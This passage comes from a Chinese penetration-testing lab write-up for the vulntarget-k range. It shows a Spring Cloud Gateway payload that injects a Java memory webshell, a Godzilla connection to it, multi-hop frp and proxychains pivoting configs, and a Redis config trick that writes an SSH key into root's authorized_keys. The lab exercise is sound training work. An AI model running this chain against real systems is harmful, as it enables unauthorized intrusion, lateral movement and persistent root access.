AAP/AD0AAwcAfwAHACUAAQcAfv8ANgAEBwB/AAcAJQcAfgABBwB++gABAIgAAAAEAAEAGwCAAAAABQEAmgAAACEAnwCgAAMAawAAAJQABAADAAAALCu5AEQBACq6AEUAALYARk27AEdZLLIASLcASbBNuwBHWSy2AEqyAEi3AEmwAAEAAAAbABwAGwADAGwAAAASAAQAAABxABAAiAAcAIkAHQCKAG0AAAAqAAQAEAAMAKEAewACAB0ADwCiAHkAAgAAACwAbgBvAAAAAAAsAKMApAABAH0AAAAGAAFcBwB+AIAAAAAFAQCjAAAApQAAAA4AAQCmAAEAm1sAAXMApxACAKgAqQACAGsAAAGYAAQABwAAAMC7AAJZtwADTSuyAAS5AEsCAMAAFU4qLbgATAO2AE06BLIAThJPuQBQAgDHABayAE4STxkEuABRuQBSAwBXpwBusgBOElMZBLkAUgMAV7sAVFm3AFU6BbIAThJPuQBQAgDAAAy2AD46BhkGGQW2AFZXGQYZBLYAVlcssgAJAxAQtgBXtgAFVxkGtgBYVywqGQW2AFkEtgBNuABatgAFVyyyAAkQELYAW7YABVenAA1OLC22AEq2AAVXLLYAB7gAXLAAAQAIAKsArgAbAAMAbAAAAEoAEgAAAHIACAB0ABUAdQAgAHYALQB3AEAAeQBNAHoAVgB7AGgAfABwAH0AeAB+AIYAfwCMAIAAngCBAKsAhQCuAIMArwCEALgAhgBtAAAAUgAIAFYAVQCqAKsABQBoAEMArAB7AAYAFQCWAK0AZgADACAAiwCuAIQABACvAAkAogB5AAMAAADAAG4AbwAAAAAAwACLAK8AAQAIALgAsACxAAIAfQAAABYABP4AQAcAsgcAfwcAJfkAakIHAH4JAIAAAAAFAQCLEAAACACzAGoAAQBrAAAAMQACAAAAAAAVuwBdWbcAXrMAThJfswAEEmCzAAaxAAAAAQBsAAAACgACAAAAFwAKABgAAwC0AAAAAgC1AScAAAASAAIAyQAPASYGCQFyAXUBcwAZAPkAAAAMAAEA+gADAPsA/AD9'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'/nnmm')}" } }], "uri": "http://example.com" }
刷新路由:
1 http://192.168.100.50:8800/actuator/gateway/refresh
接着使用哥斯拉连接,默认密码,连接地址:
1 http://192.168.100.50:8800/nnmm
成功连接!
后续需要做如下工作:
从跳板机利用wget下载chfs搭建好共享平台
上线msf
利用chfs下载frp,准备搭建多级代理
哥斯拉连接上之后,发现还存在内网,上传fscan扫描其内网C段(192.168.88.1/24),也可以直接搭建多级代理,在本机扫描。
tips4:frp多级代理 第一种配置思路:搭建链条 三个网段那就需要两层代理:
192.168.189.0/24,192.168.100.0/24,192.168.88.0/24
攻击机:如下配置
1 2 3 4 frps.ini [common] bind_addr = 0.0.0.0 bind_port = 7090
第一台跳板机:
1 2 3 4 5 6 7 8 9 10 11 12 13 frpc.ini [common] server_addr = 192.168.189.141 server_port = 7090 [socks_proxy] type = tcp local_port = 1090 remote_port =1080 plugin = socks5 frps.ini [common] bind_port = 7777
第二台跳板机:
1 2 3 4 5 6 7 8 9 10 frpc.ini [common] server_addr = 192.168.100.20 server_port = 7777 [socks_proxy] type = tcp local_port = 1090 remote_port =1090 plugin = socks5
然后给/etc/proxychains.conf,配置如下:
1 2 socks5 192.168.189.141 1080 socks5 192.168.100.20 1090
尝试:
成功代理!
profiles如下配置:
第二种配置思路:端口 攻击机:如下配置
1 2 3 4 frps.ini [common] bind_addr = 0.0.0.0 bind_port = 7090
第一台跳板机:如下配置
1 2 3 4 5 6 7 8 9 10 11 12 13 frpc.ini [common] server_addr = 192.168.189.141 server_port = 7090 [socks_proxy] type = tcp local_port = 1090 remote_port =1080 # 这个端口可以自己切换 #plugin = socks5 frps.ini [common] bind_port = 7777
第二台跳板机:如下配置
1 2 3 4 5 6 7 8 9 10 frpc.ini [common] server_addr = 192.168.100.20 server_port = 7777 [socks_proxy] type = tcp local_port = 1090 remote_port =1090 plugin = socks5
上述配置完成之后:
/etc/proxychains.conf配置如下:
即可直接访问:
如下图:
成功代理!
代理链条形成以后,相当于三个网段我都可访问。
proxifier就直接代理主机:192.168.189.141 1080即可。
常规的直接:
socks5://192.168.189.141:1080就可以成功利用这个代理了!
搭建完多级代理之后
进行端口探测发现6379开放直接利用redis
redis写ssh公钥 :
1 2 3 4 5 6 7 8 ┌──(root㉿zss)-[/home/zss/tmp/vulntarget-k] └─# proxychains redis-cli -h 192.168.88.70 -a "nbsg@123456" [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe. [proxychains] Strict chain ... 192.168.189.141:1080 ... 192.168.88.70:6379 ... OK 192.168.88.70:6379>
redis登录成功后,尝试写ssh的公钥到主机中,具体命令如下:
1 ssh-keygen -t rsa -b 2048
将生成的公钥保存到key.txt:
1 (echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n")>key.txt
将保存的key.txt文件内容写入redis:
1 cat key.txt|proxychains redis-cli -h 192.168.88.70 -a "nbsg@123456" -x set bolean
上述准备工作完成以后,登录redis:
1 proxychains redis-cli -h 192.168.88.70 -a "nbsg@123456"
配置目录:
1 config set dir /root/.ssh/
重命名:
1 config set dbfilename "authorized_keys"
最后保存即可:
如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ┌──(root💀eval)-[~/id_rsa] └─# proxychains redis-cli -h 192.168.88.70 -a "nbsg@123456" [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.15 Warning: Using a password with '-a' option on the command line interface may not be safe. [proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.88.70:6379 ... OK 192.168.88.70:6379> config set dir /root/.ssh/ OK 192.168.88.70:6379> config set dbfilename "authorized_keys" OK 192.168.88.70:6379> save OK 192.168.88.70:6379>
最后远程登录即可:
1 proxychains ssh -i id_rsa root@192.168.88.70
成功完成本次靶场测试!
